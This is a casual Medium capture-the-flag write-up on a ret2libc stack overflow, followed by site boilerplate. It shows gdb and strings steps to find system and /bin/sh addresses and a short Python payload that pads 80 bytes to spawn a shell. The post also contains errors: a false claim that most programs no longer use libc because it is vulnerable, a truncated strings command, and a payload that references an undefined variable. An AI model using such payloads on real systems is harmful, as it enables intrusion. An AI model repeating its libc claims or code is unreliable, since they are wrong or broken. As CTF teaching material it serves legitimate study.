Hello hackers! hope you are all doing well. It’s been a while since I posted something on my medium page. So without wasting any more of our precious time let us jump straight into hacking.

This particular challenge can be solved in multiple ways but the method I am about to adopt is ret2libc.

So first off…What is libc????

Well, libc stands for the library of c. It contains all the functions that a c program needs. For most of the programs that are coded these days, libc library is not involved at all because it is quite vulnerable.

Now you may possibly could a library full of c functions be exploited?

How is it vulnerable?

There is a particular function at c that we are PaRtIcUlArLy interested at( ಠ◡ಠ ). Its called the system function. Inside this system function, we have the command to pop open a shell on any system by simply calling it. We will be basically manipulating our payload to call the libc and executing the system("/bin/sh").

As the diagram suggests, first we call the system function, and then at 4 bytes offset we have our /bin/sh.

ENOUGH LECTURE! IT’S BOOORING….. let's start hamking!


Okay, It's time to assemble our avengers(addresses).

First thing’s first let's find our exact offset.

char buffer[64];
unsigned int ret;

From the program, we understand that we have about 4 bytes of ret on top of the stack and then 64 bytes of buffer space to overcome and then 4 bytes to overcome ebp. Now, all we have to find is the exact amount of padding that we need. After a few trials and errors, I found out that it's about 8 bytes.

So we have 4+64+4+8=80 bytes to reach the eip region. Now, all we have to do is find our system and bin_sh. These are the commands and methods to be followed:

First, open gdb, break main and then run the program once. Once the program is finished running. We can see our program’s process dynamically being linked to libc with the following command:

info proc mapping

Onto finding our /bin/sh inside libc. We can do so by the following command line (strings -a -t x ‘starting name of’) | grep ‘/bin/sh’. Which in our case would look like this:

(strings -a -t x /lib/ | grep ‘/bin/sh’

Now we have to add the first address of libc and the value we received with the help of strings.

AND VOILA!! we have our /bin/sh address from libc. One more address is needed to solve our puzzle which is the address of system. it is soo simple to find all we have to do is:

p system

Its time to put all these pieces together.


Like I told earlier our payload must contain enough buffer to get to eip region and then return to libc, call the system function, and pop open a shell using /bin/sh.

Putting all this together in a python file called and we get this:

padding = ‘A’*80

system= ‘\xb0\xff\xec\xb7’
sh = ‘\xbf\x63\xfb\xb7’
print padding + system + ret+ sh

And that’s it folks we have got our shell. Hope you gained some bit of knowledge and understanding from this write-up. If you did, please do consider liking my writeups, and if not…….still consider liking it pleeeeeeaseeee.

Goodbye and happy hacking( ◜◒◝ )♡




Student of sastra deemed university,1nf1n1ty core team member

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Interesting Facts and Timelines of AWS

Web Developers Q/NA Series — 1 | Talent-House {Latest 2021}

How Algolia Reduces Latency For 21B Searches Per Month

What is performance counter in .NET?

Getting text size on iOS

GSoC’21 — Week 5 and 6 — BattBot is live!

Thinking of working with us? Get to know Crimson Silicon!

This is title

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Student of sastra deemed university,1nf1n1ty core team member

More from Medium

PicoCTF_2022 \\ Basic Mod 37 \\ Cryptography

Tryhackme Inclusion Room

Capture The Talent: Detonation write-up

picoCTF: Scavenger Hunt